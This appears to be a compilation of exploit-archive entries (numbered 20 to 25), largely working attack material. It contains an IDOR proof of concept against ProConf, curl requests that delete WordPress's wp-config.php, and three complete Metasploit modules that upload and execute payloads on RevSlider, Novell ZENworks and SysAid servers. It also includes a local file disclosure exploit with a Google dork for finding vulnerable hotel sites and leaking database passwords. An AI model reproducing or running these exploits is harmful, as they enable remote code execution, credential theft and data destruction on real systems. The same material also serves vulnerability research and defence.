  20. *Exploit Title:* IDOR on ProConf Peer-Review and Conference Management System *Date:* 19/07/2018 *Exploit Author:* S. M. Zia Ur Rashid *Author Contact:* https://www.linkedin.com/in/ziaurrashid/ *Vendor Homepage:* http://proconf.org & http://myproconf.org *Affected Version:* <= 6.0 *Patched Version:* 6.1 *CVE ID:* CVE-2018-16606 *Description:* In ProConf before 6.1, an Insecure Direct Object Reference (IDOR) allows any author to view and grab all submitted papers (Title and Abstract) and their authors' personal information (Name, Email, Organization, and Position) by changing the value of Paper ID (the pid parameter). PROOF-OF-CONCEPT Step 1: Sign In as an author for a conference & submit a paper. You'll get a paper ID. Step 2: Now go to paper details and change the value of Paper ID (param pid=xxxx) to the nearest previous value to view others' submitted papers & authors' information. http://[host]/conferences/[conference-name]/author/show_paper_details.php?pid=xxxx
  21. # Exploit Title: Wordpress 4.9.6 Arbitrary File Deletion Vulnerability # Google Dork: N/A # Date: 2018-09-3 # Exploit Author: Rednofozi # Vendor Homepage: http://www.wordpress.org # Software Link:http://www.wordpress.org/download # Affected Version: 4.9.6 # Tested on: php7 mysql5 # CVE : N/A # Proof Of Concept ************************************************************************** Step 1: ``` curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php' ``` Step 2: ``` curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***' ``` ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2000
  22. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress RevSlider File Upload and Execute Vulnerability', 'Description' => %q{ This module exploits an arbitrary PHP code upload in the WordPress ThemePunch Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The vulnerability allows for arbitrary file upload and remote code execution. }, 'Author' => [ 'Simo Ben youssef', # Vulnerability discovery 'Tom Sellers <tom[at]fadedcode.net>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'], ['EDB', '35385'], ['WPVDB', '7954'], ['OSVDB', '115118'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]], 'DisclosureDate' => 'Nov 26 2015', 'DefaultTarget' => 0) ) end def check release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt') check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96') end def exploit php_pagename = rand_text_alpha(4 + rand(4)) + '.php' # Build the zip payload_zip = Rex::Zip::Archive.new # If the filename in the zip is revslider.php it will be automatically # executed but it will break the plugin and sometimes WordPress payload_zip.add_file('revslider/' + php_pagename, payload.encoded) # Build the POST body data = Rex::MIME::Message.new data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"') data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"') data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; 
name=\"update_file\"; filename=\"revslider.zip\"") post_data = data.to_s res = send_request_cgi( 'uri' => wordpress_url_admin_ajax, 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if res if res.code == 200 && res.body =~ /Update in progress/ # The payload itself almost never deleted, try anyway register_files_for_cleanup(php_pagename) # This normally works register_files_for_cleanup('../revslider.zip') final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename) print_good("#{peer} - Our payload is at: #{final_uri}") print_status("#{peer} - Calling payload...") send_request_cgi( 'uri' => normalize_uri(final_uri), 'timeout' => 5 ) elsif res.code == 200 && res.body =~ /^0$/ # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, 'ERROR') end end end
  23. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Novell ZENworks Configuration Management Arbitrary File Upload', 'Description' => %q{ This module exploits a file upload vulnerability in Novell ZENworks Configuration Management (ZCM, which is part of the ZENworks Suite). The vulnerability exists in the UploadServlet which accepts unauthenticated file uploads and does not check the "uid" parameter for directory traversal characters. This allows an attacker to write anywhere in the file system, and can be abused to deploy a WAR file in the Tomcat webapps directory. ZCM up to (and including) 11.3.1 is vulnerable to this attack. This module has been tested successfully with ZCM 11.3.1 on Windows and Linux. Note that this is a similar vulnerability to ZDI-10-078 / OSVDB-63412 which also has a Metasploit exploit, but it abuses a different parameter of the same servlet. 
}, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-0779'], ['OSVDB', '120382'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/zenworks_zcm_rce.txt'], ['URL', 'http://seclists.org/fulldisclosure/2015/Apr/21'] ], 'DefaultOptions' => { 'WfsDelay' => 30 }, 'Privileged' => true, 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'Novell ZCM < v11.3.2 - Universal Java', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 7 2015')) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), OptString.new('TARGETURI', [true, 'The base path to ZCM / ZENworks Suite', '/zenworks/']), OptString.new('TOMCAT_PATH', [false, 'The Tomcat webapps traversal path (from the temp directory)']) ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'GET' }) if res && res.code == 200 && res.body.to_s =~ /ZENworks File Upload Servlet/ return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def upload_war_and_exec(tomcat_path) app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => app_base }).to_s print_status("#{peer} - Uploading WAR file to #{tomcat_path}") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'POST', 'data' => war_payload, 'ctype' => 'application/octet-stream', 'vars_get' => { 'uid' => tomcat_path, 'filename' => "#{app_base}.war" } }) if res && res.code == 200 print_status("#{peer} - Upload appears to have been successful") else print_error("#{peer} - Failed to upload, try again with a different path?") return false end 10.times do Rex.sleep(2) # Now make a request to trigger the newly deployed war print_status("#{peer} - Attempting to launch payload in deployed WAR...") send_request_cgi({ 'uri' => normalize_uri(app_base, 
Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Failure. Unexpected answer break if res.code != 200 # Unless session... keep looping return true if session_created? end false end def exploit tomcat_paths = [] if datastore['TOMCAT_PATH'] tomcat_paths << datastore['TOMCAT_PATH'] end tomcat_paths.concat(['../../../opt/novell/zenworks/share/tomcat/webapps/', '../webapps/']) tomcat_paths.each do |tomcat_path| break if upload_war_and_exec(tomcat_path) end end end
  24. mohammad_ghazei (Hacking):
    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'zlib' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => "SysAid Help Desk 'rdslogs' Arbitrary File Upload", 'Description' => %q{ This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4. The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated file uploads and handles zip file contents in an insecure way. By combining both weaknesses, a remote attacker can accomplish remote code execution. Note that this will only work if the target is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduces a protection against null byte injection in file names. This module has been tested successfully on version v14.3.12 b22 and v14.4.32 b25 in Linux. In theory this module also works on Windows, but SysAid seems to bundle Java 7u40 and above with the Windows package which prevents the vulnerability from being exploited. 
}, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2015-2995' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ], [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ] ], 'DefaultOptions' => { 'WfsDelay' => 30 }, 'Privileged' => false, 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'SysAid Help Desk v14.3 - 14.4 / Java Universal', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 3 2015')) register_options( [ Opt::RPORT(8080), OptInt.new('SLEEP', [true, 'Seconds to sleep while we wait for WAR deployment', 15]), OptString.new('TARGETURI', [true, 'Base path to the SysAid application', '/sysaid/']) ], self.class) end def check servlet_path = 'rdslogs' bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), 'method' => 'POST', 'vars_get' => { 'rdsName' => bogus_file } }) if res && res.code == 200 return Exploit::CheckCode::Detected end end def exploit app_base = rand_text_alphanumeric(4 + rand(32 - 4)) tomcat_path = '../../../../' servlet_path = 'rdslogs' # We need to create the upload directories before our first attempt to upload the WAR. 
print_status("#{peer} - Creating upload directory") bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), 'method' => 'POST', 'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))), 'ctype' => 'application/xml', 'vars_get' => { 'rdsName' => bogus_file } }) war_payload = payload.encoded_war({ :app_name => app_base }).to_s # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail print_status("#{peer} - Uploading WAR file...") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), 'method' => 'POST', 'data' => Zlib::Deflate.deflate(war_payload), 'ctype' => 'application/octet-stream', 'vars_get' => { 'rdsName' => "#{tomcat_path}/tomcat/webapps/#{app_base}.war\x00" } }) # The server returns a 200 OK when the upload is successful. if res && res.code == 200 print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment") register_files_for_cleanup("tomcat/webapps/#{app_base}.war") else fail_with(Failure::Unknown, "#{peer} - WAR upload failed") end 10.times do select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war print_status("#{peer} - Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Success! Triggered the payload, should have a shell incoming break if res.code == 200 end end end
  25. ############################################ # Title : IBOOKING CMS - LOCAL FILE DISCLOSURE VULNERABILITY # category : webapps # Tested On : win 8 . Kali Linux # my team:https://anonysec.org # me : Rednofozi@yahoo.com # Vendor HomePage :ibooking.com.br # Google Dork: intext:"Desenvolvido por ibooking" # Software version: all ############################################ # search google Dork : intext:"Desenvolvido por ibooking" ####################Proof of Concept ############# # IBOOKING RESERVAS INTELIGENTES - LOCAL FILE DISCLOSURE VULNERABILITY USAGE: http://hotel-example.com.br/pousada/sem-cache.php?filename= < lfd > 1. GET http://hotel-example.com.br/pousada/sem-cache.php?filename=../Connections/conexao.php 2. GET view-source:hotel-example.com.br/pousada/sem-cache.php?filename=../Connections/conexao.php 3. CONTENT: <?php $hostname_conexao = "mysql.hotel-example.com.br"; $database_conexao = "exampleDB"; $username_conexao = "exampleUSER"; $password_conexao = "13password37"; $conexao = mysql_connect($hostname_conexao, $username_conexao, $password_conexao) or trigger_error(mysql_error(),E_USER_ERROR); ?> ###################### # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow https://0days.info/?exp=9461132